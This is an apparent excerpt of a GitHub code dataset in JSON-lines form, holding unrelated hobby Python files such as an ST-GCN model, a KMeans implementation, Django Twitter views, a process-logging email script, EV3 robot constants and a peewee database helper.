A.to(torch.float32))\n return y\n\ndef get_hop_distance(num_node, edge, max_hop=1): # 获取图上两点边距离\n A = np.zeros((num_node, num_node))\n for i, j in edge:\n A[j, i] = 1\n A[i, j] = 1\n\n # compute hop steps\n hop_dis = np.zeros((num_node, num_node)) + np.inf\n transfer_mat = [np.linalg.matrix_power(A, d) for d in range(max_hop + 1)]\n arrive_mat = (np.stack(transfer_mat) > 0)\n for d in range(max_hop, -1, -1):\n hop_dis[arrive_mat[d]] = d\n return hop_dis\n\ndef normalize_digraph(A):\n Dl = np.sum(A, 0)\n num_node = A.shape[0]\n Dn = np.zeros((num_node, num_node))\n for i in range(num_node):\n if Dl[i] > 0:\n Dn[i, i] = Dl[i]**(-1)\n AD = np.dot(A, Dn)\n return AD\n\nclass Graph():\n\n def __init__(self,\n layout='openpose',\n strategy='uniform',\n max_hop=1,\n dilation=1):\n self.max_hop = max_hop\n self.dilation = dilation\n\n self.get_edge(layout)\n self.hop_dis = get_hop_distance(self.num_node,\n self.edge,\n max_hop=max_hop)\n self.get_adjacency(strategy)\n\n def __str__(self):\n return self.A\n\n def get_edge(self, layout):\n # edge is a list of [child, parent] paris\n\n if layout == 'fsd10': # from openpose body-25\n self.num_node = 25\n self_link = [(i, i) for i in range(self.num_node)]\n neighbor_link = [(1, 8), (0, 1), (15, 0), (17, 15), (16, 0),\n (18, 16), (5, 1), (6, 5), (7, 6), (2, 1), (3, 2),\n (4, 3), (9, 8), (10, 9), (11, 10), (24, 11),\n (22, 11), (23, 22), (12, 8), (13, 12), (14, 13),\n (21, 14), (19, 14), (20, 19)]\n self.edge = self_link + neighbor_link\n self.center = 8\n elif layout == 'ntu-rgb+d':\n self.num_node = 25\n self_link = [(i, i) for i in range(self.num_node)]\n neighbor_1base = [(1, 2), (2, 21), (3, 21), (4, 3), (5, 21), (6, 5),\n (7, 6), (8, 7), (9, 21), (10, 9), (11, 10),\n (12, 11), (13, 1), (14, 13), (15, 14), (16, 15),\n (17, 1), (18, 17), (19, 18), (20, 19), (22, 23),\n (23, 8), (24, 25), (25, 12)]\n neighbor_link = [(i - 1, j - 1) for (i, j) in neighbor_1base]\n self.edge = self_link + neighbor_link\n self.center = 21 - 1\n elif layout == 'coco_keypoint':\n self.num_node = 17\n self_link = [(i, i) for i in range(self.num_node)]\n neighbor_1base = [(0, 1), (0, 2), (1, 3), (2, 4), (3, 5), (4, 6),\n (5, 7), (6, 8), (7, 9), (8, 10), (5, 11), (6, 12),\n (11, 13), (12, 14), (13, 15), (14, 16), (11, 12)]\n neighbor_link = [(i, j) for (i, j) in neighbor_1base]\n self.edge = self_link + neighbor_link\n self.center = 11\n else:\n raise ValueError(\"Do Not Exist This Layout.\")\n\n def get_adjacency(self, strategy):\n valid_hop = range(0, self.max_hop + 1, self.dilation)\n adjacency = np.zeros((self.num_node, self.num_node))\n for hop in valid_hop:\n adjacency[self.hop_dis == hop] = 1\n normalize_adjacency = normalize_digraph(adjacency)\n\n if strategy == 'spatial':\n A = []\n for hop in valid_hop:\n a_root = np.zeros((self.num_node, self.num_node))\n a_close = np.zeros((self.num_node, self.num_node))\n a_further = np.zeros((self.num_node, self.num_node))\n for i in range(self.num_node):\n for j in range(self.num_node):\n if self.hop_dis[j, i] == hop:\n if self.hop_dis[j, self.center] == self.hop_dis[\n i, self.center]:\n a_root[j, i] = normalize_adjacency[j, i]\n elif self.hop_dis[j, self.center] > self.hop_dis[\n i, self.center]:\n a_close[j, i] = normalize_adjacency[j, i]\n else:\n a_further[j, i] = normalize_adjacency[j, i]\n if hop == 0:\n A.append(a_root)\n else:\n A.append(a_root + a_close)\n A.append(a_further)\n A = np.stack(A)\n self.A = A\n else:\n raise ValueError(\"Do Not Exist This Strategy\")\n\nclass ConvTemporalGraphical(nn.Module): # 时间维度图卷积\n\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size, # spatial_kernel_size\n t_kernel_size=1, # 时间卷积核大小\n t_stride=1, # 时间卷积核步幅\n t_padding=0, # 时间卷积核边距填充\n t_dilation=1): # 扩展倍数?\n super().__init__()\n\n self.kernel_size = kernel_size\n self.conv = nn.Conv2d(in_channels,\n out_channels * kernel_size,\n kernel_size=(t_kernel_size, 1),\n padding=(t_padding, 0),\n stride=(t_stride, 1),\n dilation=(t_dilation, 1))\n\n def forward(self, x : np.ndarray, A):\n assert A.shape[0] == self.kernel_size\n\n x = self.conv(x)\n n, kc, t, v = x.shape\n x = x.reshape((n, self.kernel_size, kc // self.kernel_size, t, v))\n x = einsum(x, A)\n\n return x, A\n\nclass st_gcn_block(nn.Module):\n\n def __init__(self,\n in_channels,\n out_channels,\n kernel_size, # kernel_size = (temporal_kernel_size, spatial_kernel_size)\n stride=1,\n dropout=0,\n residual=True):\n super(st_gcn_block, self).__init__()\n\n assert len(kernel_size) == 2\n assert kernel_size[0] % 2 == 1\n padding = ((kernel_size[0] - 1) // 2, 0)\n\n # ?\n\n self.gcn = ConvTemporalGraphical(in_channels, out_channels, # 图卷积网络\n kernel_size[1])\n\n self.tcn = nn.Sequential( # 时间卷积网络\n nn.BatchNorm2d(out_channels),\n nn.ReLU(),\n nn.Conv2d(\n out_channels,\n out_channels,\n (kernel_size[0], 1),\n (stride, 1),\n padding,\n ),\n nn.BatchNorm2d(out_channels),\n nn.Dropout(dropout),\n )\n\n if not residual:\n self.residual = lambda x : 0 # zero\n\n elif (in_channels == out_channels) and (stride == 1):\n self.residual = lambda x : x # iden\n\n else:\n self.residual = nn.Sequential(\n nn.Conv2d(in_channels,\n out_channels,\n kernel_size=1,\n stride=(stride, 1)),\n nn.BatchNorm2d(out_channels),\n )\n\n self.relu = nn.ReLU()\n\n def forward(self, x, A):\n res = self.residual(x)\n x, A = self.gcn(x, A)\n x = self.tcn(x) + res\n return self.relu(x), A\n\nclass STGCN(nn.Module):\n \"\"\"\n ST-GCN model from:\n `\"Spatial Temporal Graph Convolutional Networks for Skeleton-Based Action Recognition\" <https://arxiv.org/abs/1801.07455>`_\n Args:\n in_channels: int, channels of vertex coordinate. 2 for (x,y), 3 for (x,y,z). Default 2.\n edge_importance_weighting: bool, whether to use edge attention. Default True.\n data_bn: bool, whether to use data BatchNorm. Default True.\n \"\"\"\n\n def __init__(self,\n num_classes,\n in_channels=2,\n edge_importance_weighting=True,\n data_bn=True,\n layout='fsd10',\n strategy='spatial',\n device='cpu',\n **kwargs):\n super(STGCN, self).__init__()\n self.data_bn = data_bn\n self.device = device\n # load graph\n self.graph = Graph( # 创建图并定义分组策略\n layout=layout,\n strategy=strategy,\n )\n # A = torch.to_tensor(self.graph.A, dtype='float32')\n # self.register_buffer('A', A) # 取出图中的矩阵,[并将矩阵存储到类中,该矩阵不会参与计算](?)\n A = deepcopy(self.graph.A)\n self.A = A\n\n # build networks 网络结构\n spatial_kernel_size = A.shape[0]\n temporal_kernel_size = 9\n kernel_size = (temporal_kernel_size, spatial_kernel_size)\n self.data_bn = nn.BatchNorm1d(in_channels *\n A.shape[1]) if self.data_bn else (lambda x : x)\n kwargs0 = {k: v for k, v in kwargs.items() if k != 'dropout'}\n self.st_gcn_networks = nn.Sequential(\n st_gcn_block(in_channels,\n 64,\n kernel_size,\n 1,\n residual=False,\n **kwargs0),\n st_gcn_block(64, 64, kernel_size, 1, **kwargs),\n st_gcn_block(64, 64, kernel_size, 1, **kwargs),\n st_gcn_block(64, 64, kernel_size, 1, **kwargs),\n st_gcn_block(64, 128, kernel_size, 2, **kwargs),\n st_gcn_block(128, 128, kernel_size, 1, **kwargs),\n st_gcn_block(128, 128, kernel_size, 1, **kwargs),\n st_gcn_block(128, 256, kernel_size, 2, **kwargs),\n st_gcn_block(256, 256, kernel_size, 1, **kwargs),\n st_gcn_block(256, 256, kernel_size, 1, **kwargs),\n )\n\n # initialize parameters for edge importance weighting 边注意力权重\n if edge_importance_weighting: # todo: fix parameter problem when enable edge importance weighting\n self.edge_importance = nn.ParameterList([\n nn.parameter(\n shape=self.A.shape,\n default_initializer=init.constant(1)) # 默认初始化为常数1\n for _ in self.st_gcn_networks\n ])\n else:\n self.edge_importance = [1] * len(self.st_gcn_networks)\n\n self.pool = nn.AdaptiveAvgPool2d(output_size=(1, 1)) # 池化层\n\n self.classify = nn.Linear(256, num_classes)\n\n def init_weights(self):\n \"\"\"Initiate the parameters.\n \"\"\"\n for layer in self.get_submodule():\n if isinstance(layer, nn.Conv2d):\n weight_init_(layer, 'Normal', mean=0.0, std=0.02)\n elif isinstance(layer, nn.BatchNorm2d):\n weight_init_(layer, 'Normal', mean=1.0, std=0.02)\n elif isinstance(layer, nn.BatchNorm1d):\n weight_init_(layer, 'Normal', mean=1.0, std=0.02)\n elif isinstance(layer, nn.Linear):\n nn.init.xavier_uniform_(layer.weight)\n\n def forward(self, x : torch.Tensor):\n # data normalization\n N, C, T, V, M = x.shape\n # 样本数(1), [x, y, 置信度](openpose, 3), 帧(1500), 关节点数量(body_25, 25), 运动员数量(1)\n # x = x.transpose((0, 4, 3, 1, 2)) # N, M, V, C, T\n x = x.transpose(1, 4).transpose(2, 4).transpose(2, 3)\n x = x.reshape((N * M, V * C, T)) # 样本*运动员数量, 帧内关节点矩阵(3, 25), 帧\n if self.data_bn: # 批量归一化\n x.stop_gradient = False\n x = self.data_bn(x)\n x = x.reshape((N, M, V, C, T))\n # x = x.transpose((0, 1, 3, 4, 2)) # N, M, C, T, V\n x = x.transpose(2, 3).transpose(3, 4)\n x = x.reshape((N * M, C, T, V))\n\n A = torch.tensor(self.A).to(self.device)\n\n # forward\n for gcn, importance in zip(self.st_gcn_networks, self.edge_importance):\n x, _ = gcn(x, torch.multiply(A, torch.tensor([importance]).to(self.device)))\n\n x = self.pool(x) # NM,C,T,V --> NM,C,1,1\n C = x.shape[1]\n x = torch.reshape(x, (N, M, C)).mean(axis=1) # N,C,1,1\n x = self.classify(x)\n return x\n","repo_name":"LuoXishuang0712/STGCN_PyTorch","sub_path":"stgcn.py","file_name":"stgcn.py","file_ext":"py","file_size_in_byte":13014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33133320029","text":"import random\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport math\nimport time\n\n## Buiding KMeans algorithms from scrath\nclass KMeans_TG:\n ## coordinates : Data points on which clusters are to be made\n ## no_of_clusters : Total number of clusters to be formed, default 3\n ## plot : 0 - no plot, 1 - original data points with centroids, 2 - plot clusters (3D can be done too)\n ## max_iter : max number iterations to try for stable clusters\n def __init__(self,coordinates,no_of_clusters=3,plot=0,max_iter=30):\n self.max_iter=max_iter\n self.plot=plot\n\n # Convert coordinates to numpy array\n if type(coordinates)!=np.ndarray:\n coordinates=np.array(coordinates)\n \n # Dimension of dataset \n n_d=coordinates.shape[1]\n centroids=[]\n self.n_d=n_d\n \n # Initializing centroids for all dimension\n for d in range(n_d):\n min_val=min(coordinates[:,d])\n max_val=max(coordinates[:,d])\n \n # Generating random centroids within the dataset range\n centroids_d=KMeans_TG.generate_centroids(min_val,max_val,no_of_clusters)\n centroids.append(centroids_d)\n \n # Transposing it to align at coordinates level\n centroids=np.array(centroids).T\n self.coordinates=coordinates\n self.centroids=centroids\n self.no_of_clusters=no_of_clusters\n\n # Generating random centroids \n def generate_centroids(min_val,max_val,no_of_points):\n coordinates=[]\n for n in range(no_of_points):\n d=random.randint(min_val,max_val)\n coordinates.append(d)\n return coordinates\n\n # Calculating sum of distances between new and old centroids\n def cal_diff(self):\n dist=0\n for centroid in range(len(self.centroids)):\n dist+=math.dist(self.new_centroids[centroid],self.centroids[centroid])\n return dist\n \n def KMeans_loop(self,count):\n if self.plot==1:\n plt.clf()\n colours=['red','yellow','blue','black','orange']\n plt.scatter(self.coordinates[:,0],self.coordinates[:,1],color='green')\n for x in range(self.no_of_clusters):\n plt.scatter(self.centroids[x][0],self.centroids[x][1],color=colours[x%5])\n plt.show()\n cluster_dict={}\n centroids_data={}\n for centroid in range(len(self.centroids)):\n cluster_dict[centroid]=[]\n centroids_data[centroid]=self.centroids[centroid]\n for pair in self.coordinates:\n min_dist=100000\n cluster=0\n for centroid in range(len(self.centroids)):\n dist=math.dist(pair,self.centroids[centroid])\n if dist<min_dist:\n min_dist=dist\n cluster=centroid\n cluster_dict[cluster].append(pair)\n\n new_centroids=[]\n self.cluster_dict=cluster_dict\n for centroid in range(len(self.centroids)):\n cluster_dict[centroid]=np.array(cluster_dict[centroid])\n new_centroids_d=[]\n for d in range(self.n_d):\n mean_val=cluster_dict[centroid][:,d].mean()\n new_centroids_d.append(mean_val) \n new_centroids.append(tuple(new_centroids_d))\n self.new_centroids=new_centroids\n if self.plot==2:\n if self.n_d>=3:\n print(\"Cannot plot more than 3 dimensions\")\n plt.clf()\n colours=['red','yellow','blue','black','orange','cyan','magenta','white','green']\n if self.n_d==3:\n \n fig = plt.figure()\n ax = Axes3D(fig)\n ax.set_zlabel('z-axis')\n \n for x in range(self.no_of_clusters):\n if self.n_d==3:\n ax.scatter(cluster_dict[x][:,0],cluster_dict[x][:,1],cluster_dict[x][:,2],colours[x])\n if self.n_d==2:\n plt.scatter(cluster_dict[x][:,0],cluster_dict[x][:,1],color=colours[x])\n if self.n_d==1:\n plt.scatter(cluster_dict[x].flatten(),[0]*len(cluster_dict[x]),color=colours[x])\n plt.show()\n self.cluster_dict=cluster_dict\n\n def fit(self):\n start = time.time()\n\n print(\"Fitting \",self.no_of_clusters,\" clusters\")\n print(\"Shape of input data : \",self.coordinates.shape)\n count=1\n print(\"Running iteration :\",count)\n self.KMeans_loop(count)\n print(\"Total Distance between coordinates :\",self.cal_diff())\n while not np.array_equal(self.new_centroids,self.centroids):\n self.centroids=self.new_centroids\n count+=1\n print(\"Running iteration :\",count)\n self.KMeans_loop(count)\n print(\"Total Distance between coordinates :\",self.cal_diff())\n if count>=self.max_iter:\n break\n end = time.time()\n print(\"Total time taken (in seconds) : \",round(end - start,2))\n return\n \n def predict(self,data):\n start = time.time()\n cluster_dict={}\n for centroid in range(len(self.centroids)):\n cluster_dict[centroid]=[]\n for pair in data:\n min_dist=100000\n cluster=0\n for centroid in range(len(self.centroids)):\n dist=math.dist(pair,self.centroids[centroid])\n if dist<min_dist:\n min_dist=dist\n cluster=centroid\n cluster_dict[cluster].append(pair)\n\n end = time.time()\n print(\"Total time taken (in seconds) : \",round(end - start,2))\n return cluster_dict \n\n \n \n ","repo_name":"Tarungarg98/ML_Algos","sub_path":"Unsupervised_TG.py","file_name":"Unsupervised_TG.py","file_ext":"py","file_size_in_byte":5817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29601640548","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom feed.utils import *\nfrom django.template import loader\nfrom django.urls import reverse\nfrom .formfile import TokenForm\n\n\ndef checkAuth(request):\n access_token_temp = request.session.get('access_token', None)\n access_token_secret_temp = request.session.get('access_token_secret', None)\n if access_token_temp is None or access_token_secret_temp is None:\n return redirect('/auth/authorize/')\n else:\n return redirect(reverse('hashTag'))\n\n\ndef autho(request):\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n try:\n redirect_url = auth.get_authorization_url()\n except tweepy.TweepError:\n return HttpResponse('Error! Failed to get request token.')\n request.session['request_token'] = auth.request_token\n template = loader.get_template('feed/basic.html')\n form = TokenForm()\n context = {\n 'url': redirect_url,\n 'form': form,\n }\n return HttpResponse(template.render(context, request))\n\n\ndef hello(request):\n return HttpResponse(\"hello\")\n\n\ndef authorize(request):\n if request.method == 'POST':\n form = TokenForm(request.POST)\n if form.is_valid():\n token = form.cleaned_data['token']\n auth = tweepy.OAuthHandler(consumer_key, consumer_secret)\n rt = request.session['request_token']\n del request.session['request_token']\n auth.request_token = rt\n try:\n a, b = auth.get_access_token(token)\n except tweepy.TweepError:\n return HttpResponse(\"invalid token\")\n auth.set_access_token(a, b)\n request.session['access_token'] = a\n request.session['access_token_secret'] = b\n return redirect(reverse('feed'))\n else:\n return redirect(reverse('index'))\n\n\ndef feed(request):\n api = completeAuth(request)\n public_tweets = api.home_timeline()\n context = {\n 'api': api,\n 'pt': public_tweets,\n }\n template = loader.get_template('feed/tweets.html')\n return HttpResponse(template.render(context, request))\n\n\ndef hashtagFeed(request):\n api = completeAuth(request)\n res = requests.get('https://ipinfo.io/')\n res_json = res.json()\n coords = res_json['loc'].split(',')\n text = api.trends_closest(coords[0], coords[1])\n pid = text[0]['woeid']\n hashtags = api.trends_place(pid)[0]['trends']\n context = {\n 'hashtags': hashtags,\n }\n template = loader.get_template('feed/trending_tags.html')\n return HttpResponse(template.render(context, request))\n\n\ndef logout(request):\n request.session.flush()\n return redirect(reverse('index'))\n\n\n\n\n\n\n","repo_name":"hitanshu310/twitter_news","sub_path":"Tnews/feed/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"36442835034","text":"# 予想されたAC時間は30 minsやったが、実際は6分でAC\nfrom collections import Counter\n\nN = int(input())\nr = list(input())\ndic = Counter(r)\n# 変数名に標準ライブラリ関数と被る単語は使わないでおこう\ntot = 0\nfor k, v in dic.items():\n if k == \"A\":\n tot += 4 * v\n elif k == \"B\":\n tot += 3 * v\n elif k == \"C\":\n tot += 2 * v\n elif k == \"D\":\n tot += 1 * v\n else:\n tot += 0 * v\n\nans = tot / N\n\nprint(ans)\n","repo_name":"poponzu/atcoder1","sub_path":"atcoder/ARC/3/arc_3_a.py","file_name":"arc_3_a.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"35652222518","text":"import xlsxwriter as xl;\n\nbook = xl.Workbook ('cpp.xlsx');\nsheet = book.add_worksheet ();\nquestions = open ('ans', 'r').readlines ();\n#answers = open ('ans', 'r').readlines ();\nsols = [];\nq_num = 1;\nopt_num = 1;\n\nfor i in range (len (questions)):\n\tif ('. ' in questions [i]):\n\t\tif (questions [i] [0].isnumeric ()):\n\t\t\t#QUESTION\n\t\t\topt_num = 1;\n\t\t\tques = questions [i] [questions [i].index ('. ')+2 : ];\n\n\t\t\tcounter = i + 1;\n\t\t\twhile ('. ' not in questions [counter]):\n\t\t\t\tques += questions [counter];\n\t\t\t\tcounter += 1;\n\n\t\t\tsheet.write ('A' + str (q_num), ques);\n\t\t\tprint (q_num, ques)\n\t\t\tq_num += 1;\n\t\telse:\n\t\t\t#OPTION\n\t\t\toption = questions [i] [questions [i].index ('. ')+2 : ];\n\t\t\tcounter = i + 1;\n\t\t\twhile (counter < len (questions) and '. ' not in questions [counter]):\n\t\t\t\toption += questions [counter];\n\t\t\t\tcounter += 1;\n\n\t\t\tsheet.write (chr (70 + opt_num) + str (q_num-1), option)\n\t\t\tprint (opt_num, option);\n\t\t\topt_num += 1;\n\n'''\nques_num = 1;\nfor line in answers:\n\tprint (ord (line [-2])-64);\n#\tques_num += 1;\n#\tsheet.write ('L' + str (ques_num), ord (line [-2]) - 96);\n\t\t\t\n'''\n'''\nques_num = 1;\nnenc = True;\nfor char in answers:\n\tif (char.isalpha ()):\n\t\tif (ques_num == 93 and nenc):\n\t\t\tnenc = False;\n\t\t\tcontinue;\n\t\tsols.append ( (ques_num, ord (char) - 96) );\n\t\tsheet.write ('L' + str (ques_num), ord (char) - 96);\n\t\tques_num += 1;\n'''\n\nbook.close ();\n","repo_name":"duaraghav8/Scrapers","sub_path":"makexl.py","file_name":"makexl.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22492104982","text":"import os\nimport sys\nimport time\nimport psutil\nimport urllib.request as urllib2\nimport smtplib\nimport schedule\nfrom sys import *\nfrom email import encoders\nfrom email.mime.text import MIMEText\nfrom email.mime.base import MIMEBase\nfrom email.mime.multipart import MIMEMultipart\n\ndef is_connected():\n\ttry:\n\t\turllib2.urlopen('http://216.58.192.142',timeout=1)\n\t\treturn True\n\texcept urllin2.URLError as err:\n\t\treturn False\ndef MailSender(filename, time):\n\ttry:\n\t\turllib2.urlopen('http://216.58.192.142',timeout=1)\n\t\tfromaddr = \"senderMail@gmail.com\"\n\t\ttoaddr = \"receiverMail@gmail.com\"\n\t\n\t\tmsg = MIMEMultipart()\n\t\tmsg['From'] = fromaddr\n\t\tmsg['to'] = sys.argv[1]\n\n\t\tbody = \"\"\"\n\t\tHello %s, Please find attached document which contains log of Running process.\n\t\tLog file is created at :%s\t\n\t\t\n\t\tThis is auto generated mail\n\t\tThanks & Regards,\n\t\tAkshay Pawar.\"\"\"%(toaddr,time)\n\n\t\tSubject = \"\"\"Akshay Pawar Process log generated at :%s\"\"\"%(time)\n\n\t\tmsg['Subject'] = Subject\n\n\t\tmsg.attach(MIMEText(body,'plain'))\n\n\t\tattachment = open(filename, \"rb\")\n\t\tp = MIMEBase('application','actet-stream')\n\t\tp.set_payload((attachment).read())\n\t\tencoders.encode_base64(p)\n\t\tp.add_header('Content-Disposition',\"attachment;filename= %s\" % filename)\n\t\n\t\tmsg.attach(p)\n\t\ts = smtplib.SMTP('smtp.gmail.com',587)\n\t\ts.starttls()\n\t\ts.login(fromaddr,\"senderMailPassword\")\n\t\ttext = msg.as_string()\n\t\ts.sendmail(fromaddr,toaddr,text)\n\t\ts.quit()\n\t\tprint(\"log file successfully send thruogh mail...\")\n\t\t\n\texcept Exception as E:\n\t\tprint(\"Unable to send mail\",E)\n\n\ndef ProcessLog(log_dir = 'LogFile'):\n\tlistprocess = []\n\tif not os.path.exists(log_dir):\n\t\ttry:\n\t\t\tos.mkdir(log_dir)\n\t\texcept:\n\t\t\tpass\n\n\tseparator = \"-\" * 70\n\tlog_path = os.path.join(log_dir,\"AkshayPawar%s.log\"%(time.ctime()))\n\tf = open(log_path,'w')\n\tf.write(separator + \"\\n\")\n\tf.write(\"process logger: \"+time.ctime() + \"\\n\")\n\tf.write(separator + \"\\n\")\n\tf.write(\"\\n\")\n\n\tfor proc in psutil.process_iter():\n\t\ttry:\n\t\t\tpinfo = proc.as_dict(attrs = ['pid','name','username'])\n\t\t\tvms = proc.memory_info().vms/(1024*1024)\n\t\t\tpinfo['vms'] = vms\n\t\t\tlistprocess.append(pinfo)\n\t\texcept (psutil.NoSuchProcess, psutil.AccessDenied, psutil.ZombieProcess):\n\t\t\tpass\n\n\tfor element in listprocess:\n\t\tf.write(\"%s\\n\"%element)\n\n\tprint(\"Log file is successfuly generated at location %s\"%(log_path))\n\tconnected = is_connected()\n\n\tif connected:\n\t\tstarttime = time.time()\n\t\tMailSender(log_path, time.ctime())\n\t\tendtime = time.time()\n\t\tprint(\"Took %s seconds to send mail\"%(endtime-starttime))\n\telse:\n\t\tprint(\"There is no Internet connection\")\n\t\n\ndef main():\n\tprint(\"Application name:\"+argv[0])\n\tif(len(argv) != 2):\n\t\tprint(\"Invalid number of argument...\")\n\t\texit()\n\tif(argv[1] == \"-h\") or (argv[1] == \"-H\"):\n\t\tprint(\"This srcipt is used log record of running processess...\")\n\t\texit()\n\tif(argv[1] == \"-u\") or (argv[1] == \"-U\"):\n\t\tprint(\"ApplicationName.py AbsolutePath_of_Directory\")\n\t\texit()\n\n\ttry:\n\t\tProcessLog()\n\t\t#schedule.every(int(argv[1])).minutes.do(ProcessLog)\n\t\t#while True:\n\t\t#\tschedule.run_pending()\n\t\t#\ttime.sleep(1)\n\texcept ValueError:\n\t\tprint(\"Error : Invalid input\",E)\n\nif __name__==\"__main__\":\n\tmain()\n","repo_name":"akshaypawar696/processLogFile","sub_path":"processLogFile.py","file_name":"processLogFile.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7359475016","text":"from pybricks.parameters import Direction, Port\n\n# Wait time in milliseconds inbetween busy loop iterations.\nDEFAULT_WAIT_TIME = 10\n\n# The maximum speed of the leg axles. This vlaue has been carefully measured\n# to ensure that the robot stays steady while executing an action.\nMAX_SPEED = 125\n\n# Default speed for all robot actions.\nDEFAULT_SPEED = MAX_SPEED // 2\n\n# Reset speed.\nRESET_SPEED = -DEFAULT_SPEED\n\n# The duty/actuation to apply to the motors during reset. This value has been\n# carefully measured to allow the legs to fold up but not jam into th emodel.\nRESET_DUTY = 40\n\n\n#### Front Leg Set\n\nFRONT_RIGHT_LEG_UPPER_PORT = Port.D\nFRONT_RIGHT_LEG_LOWER_PORT = Port.C\nFRONT_LEFT_LEG_UPPER_PORT = Port.A\nFRONT_LEFT_LEG_LOWER_PORT = Port.B\n\nFRONT_UPPER_DIRECTION = Direction.COUNTERCLOCKWISE\nFRONT_LOWER_DIRECTION = Direction.COUNTERCLOCKWISE\n\nFRONT_UPPER_GEARS = [8, 40]\nFRONT_LOWER_GEARS = [8, 40]\n\n# These angles have been carefully measured to provide a max upright position\n# while keep the robot stable. An angle of 0 degrees is the folded up position.\nFRONT_MAX_UPRIGHT_UPPER_ANGLE = 60\nFRONT_MAX_UPRIGHT_LOWER_ANGLE = 120\n\n# Those angles are relative to the max upright angles.\nFRONT_MAX_LIFTUP_UPPER_ANGLE = 60\nFRONT_MAX_LIFTUP_LOWER_ANGLE = 40\n\n#### Back Leg Set\n\nBACK_RIGHT_LEG_UPPER_PORT = Port.A\nBACK_RIGHT_LEG_LOWER_PORT = Port.B\nBACK_LEFT_LEG_UPPER_PORT = Port.D\nBACK_LEFT_LEG_LOWER_PORT = Port.C\n\nBACK_UPPER_DIRECTION = Direction.CLOCKWISE\nBACK_LOWER_DIRECTION = Direction.CLOCKWISE\n\nBACK_UPPER_GEARS = [8, 40]\nBACK_LOWER_GEARS = [8, 40]\n\n# These angles have been carefully measured to provide a max upright position\n# while keep the robot stable. An angle of 0 degrees is the folded up position.\nBACK_MAX_UPRIGHT_UPPER_ANGLE = 60\nBACK_MAX_UPRIGHT_LOWER_ANGLE = 120\n\n# XXX: Angles need to be determined.\n# Those angles are relative to the max upright angles.\nBACK_MAX_LIFTUP_UPPER_ANGLE = 0\nBACK_MAX_LIFTUP_LOWER_ANGLE = 135\n\n","repo_name":"strichter/ev3-dog","sub_path":"dog/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"39562029919","text":"from peewee import SqliteDatabase, Model, CharField, IntegerField, \\\n FloatField, ForeignKeyField, PrimaryKeyField, DateField, DateTimeField, \\\n BooleanField, DoesNotExist, IntegrityError, OP, Expression, JOIN\nfrom os import getcwd, path, listdir, setpgrp\nfrom svn.local import LocalClient\nfrom utils import *\nfrom enum import Enum\nimport sys\nfrom subprocess import Popen, DEVNULL\nfrom functools import reduce\nimport socket\nimport re\nfrom collections import defaultdict\nfrom xml.dom.minidom import parse, Document\nfrom wrapt import ObjectProxy\n\n# from types import MethodType\n\ndb = SqliteDatabase('asp.sqlite')\nbackup_matcher = r\"asp.(\\d+).sqlite\"\nbackup_pattern = 'asp.{}.sqlite'\nos_db = SqliteDatabase(socket.gethostname() + '.sqlite')\n\n\nclass OS(Enum):\n OSX = 'darwin'\n LINUX = 'linux'\n\n # WIN = 'windows'\n\n @property\n def is_running(self):\n return self.value == sys.platform\n\n\n# Todo: make a @lazy decorator for methods\n\nclass Record(object):\n def __init__(self, data: dict = None, **kwargs):\n self.data = data.copy() if data else {}\n self.data.update(kwargs)\n self.id_values = None\n self.unique = {}\n\n def __get__(self, record, model=None):\n if not record is None:\n raise AttributeError('Record may not be called on class')\n\n if self.id_values:\n return self.sq_from_model(model, **self.id_values).get()\n\n # necesarry to enable self-reference of records in self-referencial models.\n def recursive(v):\n return v.__get__(None, model) if isinstance(v, type(self)) else v\n\n data = {k: recursive(v) for k, v in self.data.items()}\n\n funique = self.first_unique(model, True)\n filter = lambda k, v: k in funique\n r, created = self.get_or_create(model, *self.part_dict(data, filter))\n\n self.id_values = {fname: getattr(r, fname) for fname in\n self.primary_index(model)}\n\n if created:\n print(\"created {}: {}\".format(model, data))\n return r\n\n def first_unique(self, model, strict=False):\n try:\n return next(x for x in self.unique_indexes(model) if\n all(id in self.data for id in x))\n except StopIteration:\n if not strict:\n return model._meta.get_field_names()\n raise Exception(\n 'No unique index for record {} in {}\\nIndexes: {}'.format(\n self.data, model, self.unique_indexes(model)))\n\n @classmethod\n def unique_indexes(cls, model):\n r = [fields for fields, unique in model._meta.indexes if unique]\n r.append(cls.primary_index(model))\n return r\n\n @classmethod\n def unique_indexes(cls, model):\n r = [fields for fields, unique in model._meta.indexes if unique]\n r += [[n] for n, f in model._meta.fields.items() if f.unique]\n r.append(cls.primary_index(model))\n return r\n\n @classmethod\n def primary_index(cls, model):\n return tuple(f.name for f in model._meta.get_primary_key_fields())\n\n @classmethod\n def get_or_create(cls, model, key_values, defaults):\n sq = cls.sq_from_model(model, **key_values)\n try:\n return sq.get(), False\n except DoesNotExist:\n try:\n params = {k: v for k, v in key_values.items() if '__' not in k}\n params.update(defaults)\n with model._meta.database.atomic():\n return model.create(**params), True\n except IntegrityError as exc:\n try:\n return sq.get(), False\n except DoesNotExist:\n raise exc\n\n @classmethod\n def sq_from_model(cls, model, **kwargs):\n null_kvs, notnull_kvs = cls.part_dict(kwargs, lambda k, v: v is None)\n sq = model.select()\n if null_kvs:\n sq = sq.where(*(model._meta.fields[n].is_null() for n in null_kvs))\n if notnull_kvs:\n sq = sq.filter(**notnull_kvs)\n return sq\n\n @staticmethod\n def part_dict(d: dict, predicade=lambda k, v: v):\n return {k: v for k, v in d.items() if predicade(k, 